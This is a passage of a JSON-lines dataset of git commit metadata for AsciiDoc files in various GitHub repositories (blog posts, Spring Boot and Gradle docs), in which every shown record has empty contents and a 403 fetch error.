-boot,srikalyan\/spring-boot,nareshmiriyala\/spring-boot,bjornlindstrom\/spring-boot,balajinsr\/spring-boot,joshiste\/spring-boot,donthadineshkumar\/spring-boot,kamilszymanski\/spring-boot,buobao\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ChunPIG\/spring-boot,rweisleder\/spring-boot,nurkiewicz\/spring-boot,minmay\/spring-boot,wwadge\/spring-boot,spring-projects\/spring-boot,qerub\/spring-boot,srikalyan\/spring-boot,sbuettner\/spring-boot,pnambiarsf\/spring-boot,auvik\/spring-boot,jayeshmuralidharan\/spring-boot,rmoorman\/spring-boot,domix\/spring-boot,xialeizhou\/spring-boot,meloncocoo\/spring-boot,mike-kukla\/spring-boot,mosen11\/spring-boot,ojacquemart\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,lif123\/spring-boot,jjankar\/spring-boot,RishikeshDarandale\/spring-boot,meftaul\/spring-boot,zhangshuangquan\/spring-root,jeremiahmarks\/spring-boot,meftaul\/spring-boot,playleud\/spring-boot,vakninr\/spring-boot,jrrickard\/spring-boot,htynkn\/spring-boot,jrrickard\/spring-boot,qq83387856\/spring-boot,lcardito\/spring-boot,RobertNickens\/spring-boot,NetoDevel\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,liupugong\/spring-boot,vpavic\/spring-boot,bjornlindstrom\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,Chomeh\/spring-boot,lingounet\/spring-boot,rmoorman\/spring-boot,durai145\/spring-boot,durai145\/spring-boot,i007422\/jenkins2-course-spring-boot,fjlopez\/spring-boot,Charkui\/spring-boot,mabernardo\/spring-boot,johnktims\/spring-boot,thomasdarimont\/spring-boot,krmcbride\/spring-boot,166yuan\/spring-boot,PraveenkumarShethe\/spring-boot,rstirling\/spring-boot,ihoneymon\/spring-boot,lburgazzoli\/spring-boot,mohican0607\/spring-boot,rickeysu\/spring-boot,damoyang\/spring-boot,hqrt\/jenkins2-course-spring-boot,trecloux\/spring-boot,murilobr\/spring-boot,jeremiahmarks\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,srinivasan01\/spring-boot,frost2014\/spring-boot,lingounet\/spring-boot,vaseemahmed01\/spring-boot,srinivasan01\/spring-boot,kayelau\/spring-boot,VitDevelop\/spring-boot,chrylis\/spring-boot,rmoorman\/spring-boot,RainPlanter\/spring-boot,rizwan18\/spring-boot,murilobr\/spring-boot,soul2zimate\/spring-boot,pnambiarsf\/spring-boot,qq83387856\/spring-boot,dnsw83\/spring-boot,DONIKAN\/spring-boot,qq83387856\/spring-boot,joansmith\/spring-boot,paweldolecinski\/spring-boot,chrylis\/spring-boot,isopov\/spring-boot,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,fogone\/spring-boot,SPNilsen\/spring-boot,nelswadycki\/spring-boot,rstirling\/spring-boot,afroje-reshma\/spring-boot-sample,forestqqqq\/spring-boot,johnktims\/spring-boot,jvz\/spring-boot,jmnarloch\/spring-boot,pnambiarsf\/spring-boot,meftaul\/spring-boot,SPNilsen\/spring-boot,AstaTus\/spring-boot,joshthornhill\/spring-boot,Nowheresly\/spring-boot,mlc0202\/spring-boot,gauravbrills\/spring-boot,tbadie\/spring-boot,royclarkson\/spring-boot,Nowheresly\/spring-boot,nurkiewicz\/spring-boot,liupugong\/spring-boot,RobertNickens\/spring-boot,gregturn\/spring-boot,lenicliu\/spring-boot,prasenjit-net\/spring-boot,patrikbeno\/spring-boot,felipeg48\/spring-boot,allyjunio\/spring-boot,fireshort\/spring-boot,eric-stanley\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,prakashme\/spring-boot,ralenmandao\/spring-boot,brettwooldridge\/spring-boot,JiweiWong\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,VitDevelop\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,roberthafner\/spring-boot,imranansari\/spring-boot,jjankar\/spring-boot,npcode\/spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,rweisleder\/spring-boot,nghiavo\/spring-boot,fireshort\/spring-boot,rams2588\/spring-boot,mdeinum\/spring-boot,xialeizhou\/spring-boot,RainPlanter\/spring-boot,keithsjohnson\/spring-boot,end-user\/spring-boot,jmnarloch\/spring-boot,scottfrederick\/spring-boot,spring-projects\/spring-boot,jmnarloch\/spring-boot,yunbian\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,sankin\/spring-boot,brettwooldridge\/spring-boot,mouadtk\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,gorcz\/spring-boot,lokbun\/spring-boot,javyzheng\/spring-boot,SPNilsen\/spring-boot,lokbun\/spring-boot,SPNilsen\/spring-boot,master-slave\/spring-boot,jforge\/spring-boot,tsachev\/spring-boot,nandakishorm\/spring-boot,xdweleven\/spring-boot,nebhale\/spring-boot,drunklite\/spring-boot,joshiste\/spring-boot,mlc0202\/spring-boot,xiaoleiPENG\/my-project,neo4j-contrib\/spring-boot,end-user\/spring-boot,MrMitchellMoore\/spring-boot,deki\/spring-boot,satheeshmb\/spring-boot,xc145214\/spring-boot,tan9\/spring-boot,VitDevelop\/spring-boot,jorgepgjr\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,buobao\/spring-boot,prasenjit-net\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,jayeshmuralidharan\/spring-boot,tbadie\/spring-boot,Nowheresly\/spring-boot,ojacquemart\/spring-boot,xiaoleiPENG\/my-project,sbuettner\/spring-boot,existmaster\/spring-boot,patrikbeno\/spring-boot,hello2009chen\/spring-boot,RobertNickens\/spring-boot,RishikeshDarandale\/spring-boot,kdvolder\/spring-boot,Xaerxess\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,VitDevelop\/spring-boot,jforge\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,candrews\/spring-boot,domix\/spring-boot,jbovet\/spring-boot,balajinsr\/spring-boot,gregturn\/spring-boot,crackien\/spring-boot,paddymahoney\/spring-boot,simonnordberg\/spring-boot,htynkn\/spring-boot,end-user\/spring-boot,panbiping\/spring-boot,zorosteven\/spring-boot,PraveenkumarShethe\/spring-boot,thomasdarimont\/spring-boot,orangesdk\/spring-boot,lucassaldanha\/spring-boot,panbiping\/spring-boot,eliudiaz\/spring-boot,ollie314\/spring-boot,wilkinsona\/spring-boot,mrumpf\/spring-boot,donthadineshkumar\/spring-boot,bjornlindstrom\/spring-boot,simonnordberg\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,SPNilsen\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,srinivasan01\/spring-boot,auvik\/spring-boot,jrrickard\/spring-boot,nebhale\/spring-boot,jxblum\/spring-boot,brettwooldridge\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,mlc0202\/spring-boot,bijukunjummen\/spring-boot,olivergierke\/spring-boot,raiamber1\/spring-boot,jforge\/spring-boot,M3lkior\/spring-boot,krmcbride\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,nisuhw\/spring-boot,yuxiaole\/spring-boot,christian-posta\/spring-boot,peteyan\/spring-boot,christian-posta\/spring-boot,DeezCashews\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,Chomeh\/spring-boot,simonnordberg\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,clarklj001\/spring-boot,yuxiaole\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,npcode\/spring-boot,royclarkson\/spring-boot,ractive\/spring-boot,prakashme\/spring-boot,jayarampradhan\/spring-boot,nisuhw\/spring-boot,marcellodesales\/spring-boot,tiarebalbi\/spring-boot,keithsjohnson\/spring-boot,joshthornhill\/spring-boot,designreuse\/spring-boot,xwjxwj30abc\/spring-boot,jorgepgjr\/spring-boot,rickeysu\/spring-boot,royclarkson\/spring-boot,orangesdk\/spring-boot,ilayaperumalg\/spring-boot,zorosteven\/spring-boot,AstaTus\/spring-boot,linead\/spring-boot,eric-stanley\/spring-boot,frost2014\/spring-boot,xingguang2013\/spring-boot,jayeshmuralidharan\/spring-boot,PraveenkumarShethe\/spring-boot,prakashme\/spring-boot,ihoneymon\/spring-boot,mbenson\/spring-boot,na-na\/spring-boot,roymanish\/spring-boot,lcardito\/spring-boot,kiranbpatil\/spring-boot,xingguang2013\/spring-boot,akmaharshi\/jenkins,fulvio-m\/spring-boot,satheeshmb\/spring-boot,axibase\/spring-boot,ralenmandao\/spring-boot,eliudiaz\/spring-boot,axelfontaine\/spring-boot,herau\/spring-boot,tbbost\/spring-boot,designreuse\/spring-boot,na-na\/spring-boot,durai145\/spring-boot,smilence1986\/spring-boot,DONIKAN\/spring-boot,isopov\/spring-boot,nareshmiriyala\/spring-boot,izestrea\/spring-boot,roymanish\/spring-boot,kayelau\/spring-boot,eddumelendez\/spring-boot,5zzang\/spring-boot,mabernardo\/spring-boot,prakashme\/spring-boot,rstirling\/spring-boot,sbcoba\/spring-boot,jcastaldoFoodEssentials\/spring-boot,nandakishorm\/spring-boot,SaravananParthasarathy\/SPSDemo,fulvio-m\/spring-boot,ChunPIG\/spring-boot,sungha\/spring-boot,eliudiaz\/spring-boot,keithsjohnson\/spring-boot,donthadineshkumar\/spring-boot,philwebb\/spring-boot,panbiping\/spring-boot,hklv\/spring-boot,mdeinum\/spring-boot,mabernardo\/spring-boot,rstirling\/spring-boot,lingounet\/spring-boot,xialeizhou\/spring-boot,drumonii\/spring-boot,balajinsr\/spring-boot,nevenc-pivotal\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,rams2588\/spring-boot,Buzzardo\/spring-boot,jeremiahmarks\/spring-boot,cmsandiga\/spring-boot,philwebb\/spring-boot-concourse,mbrukman\/spring-boot,10045125\/spring-boot,drunklite\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,murilobr\/spring-boot,jjankar\/spring-boot,rizwan18\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,end-user\/spring-boot,ollie314\/spring-boot,wwadge\/spring-boot,okba1\/spring-boot,zhanhb\/spring-boot,donthadineshkumar\/spring-boot,zorosteven\/spring-boot,yunbian\/spring-boot,joansmith\/spring-boot,dfa1\/spring-boot,Nowheresly\/spring-boot,xdweleven\/spring-boot,RichardCSantana\/spring-boot,M3lkior\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,forestqqqq\/spring-boot,MasterRoots\/spring-boot,krmcbride\/spring-boot,jmnarloch\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soul2zimate\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0aefc8b4772730cea32fe5034c5389481078db1d","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53529597df5a56657cf2199554cd06951632f5d8","subject":"Update 2017-01-22-Customer-Segments.adoc","message":"Update 2017-01-22-Customer-Segments.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-22-Customer-Segments.adoc","new_file":"_posts\/2017-01-22-Customer-Segments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1759e0c126eebc61e5c2c17a7cdd9d0441520dc2","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"060b0efc2cc8a6b43094c06d030d21202c4bf41a","subject":"Add initial API doc draft","message":"Add initial API doc draft\n","repos":"huskydocs\/api","old_file":"api.asciidoc","new_file":"api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huskydocs\/api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6c29f2cf5df42a34e86055900484a4e76d44cd","subject":"Update 2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","message":"Update 2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","new_file":"_posts\/2016-12-10-Review-Gestao-de-Pessoas-como-construir-uma-equipe-forte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aa8bff05aa6e5d6d3aab38aaab25566ac3000f8","subject":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","message":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6770d422074157ee0b1eaa9890329959eac59ca7","subject":"Update language in Compiling.adoc","message":"Update language in Compiling.adoc","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e3b674b46dae734f7115d6a065b596479b6657b2","subject":"Update 2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc","message":"Update 2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc","new_file":"_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67cc15fa3cb4d483773d977df700af3bc9002ad8","subject":"y2b create post Galaxy S6 Exclusive First Look","message":"y2b create post Galaxy S6 Exclusive First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-27-Galaxy-S6-Exclusive-First-Look.adoc","new_file":"_posts\/2015-02-27-Galaxy-S6-Exclusive-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73a9fd2ef227847756a63caf2a7cfe85ba22267d","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c5fcc669139746b7b4118092b8280a8754ad3b","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75e10ebf2256abebc95bdf515825a8711eab2ba2","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bec09f602e7d4b16cd67888359a1f46875ca55ac","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a645a9eebdf13089eb2a066554d4063796db5fd2","subject":"Update 2016-02-16-Rename-Cocoa-Pods-Xcode-Project.adoc","message":"Update 2016-02-16-Rename-Cocoa-Pods-Xcode-Project.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Rename-Cocoa-Pods-Xcode-Project.adoc","new_file":"_posts\/2016-02-16-Rename-Cocoa-Pods-Xcode-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f70cbab6562067a82c83ced4f28912c7c5894b","subject":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","message":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cdf5d6d3f1c47553892d68bfd573b3d86838040","subject":"Update 2015-05-14-Yeah.adoc","message":"Update 2015-05-14-Yeah.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-14-Yeah.adoc","new_file":"_posts\/2015-05-14-Yeah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4275b4b6458588386cd06d46c78a147e2dcb6099","subject":"Update subprojects\/docs\/src\/docs\/userguide\/extending-gradle\/custom_plugins.adoc","message":"Update subprojects\/docs\/src\/docs\/userguide\/extending-gradle\/custom_plugins.adoc\n\nCo-Authored-By: Sterling Greene <f8dc2ca1b24f71bd07cf2580bf789fed70c9e45c@users.noreply.github.com>","repos":"gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/extending-gradle\/custom_plugins.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/extending-gradle\/custom_plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindpirate\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"512ad9e7e48c0db7183994aaaa674381b38ca819","subject":"Document AuthorizedClientServiceOAuth2AuthorizedClientManager","message":"Document AuthorizedClientServiceOAuth2AuthorizedClientManager\n\nFixes gh-8152\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-client.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca1ca2fcb449d2eb50792e1a11f90baffcfb3bcd","subject":"added minimal changelog","message":"added minimal changelog\n","repos":"simpligility\/maven-repository-tools,simpligility\/maven-repository-tools","old_file":"changelog.asciidoc","new_file":"changelog.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simpligility\/maven-repository-tools.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3706a32440ee32ca11d75a8b4e9de87d3e76cce0","subject":"Renamed '_posts\/2017-07-10.adoc' to '_posts\/2017-10-16-Danphe-BaaS.adoc'","message":"Renamed '_posts\/2017-07-10.adoc' to '_posts\/2017-10-16-Danphe-BaaS.adoc'","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44b9e43e28e8725a195963c8290b6d14d4e1de94","subject":"CL - CEPL","message":"CL - CEPL\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c5a970efc0ecd513af614acda5f1313d9eccc4cb","subject":"y2b create post iPhone 4S Camera","message":"y2b create post iPhone 4S Camera","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-05-iPhone-4S-Camera.adoc","new_file":"_posts\/2011-10-05-iPhone-4S-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"848f25be55f88a92db7914ae9e0682430b2dd987","subject":"Update 2016-06-05-Technology-Acceptance-Model.adoc","message":"Update 2016-06-05-Technology-Acceptance-Model.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2016-06-05-Technology-Acceptance-Model.adoc","new_file":"_posts\/2016-06-05-Technology-Acceptance-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45cd18292c2d2d59750fa439bf4181986a5f3e75","subject":"Mention issue","message":"Mention issue\n\nSigned-off-by: Kanstantsin Shautsou <726516dea2238e859d5028bfb21f227f655fd603@gmail.com>\n","repos":"pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/FEATURES.adoc","new_file":"docs\/FEATURES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e005659fe0dcff677355e879f1945422af2953aa","subject":"update NOTES","message":"update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d8da2f61cc06dc6fa1b7379dccfe3f2ddc33187","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bb46789347490433a272e1d42864ea4283e7921","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-ratelimit","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-ratelimit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2dfcd84acf05532e90a2905934ebca9950f48054","subject":"Update 2017-10-20-Trigger-click-when-determinate-request-finish-using-AngularJS.adoc","message":"Update 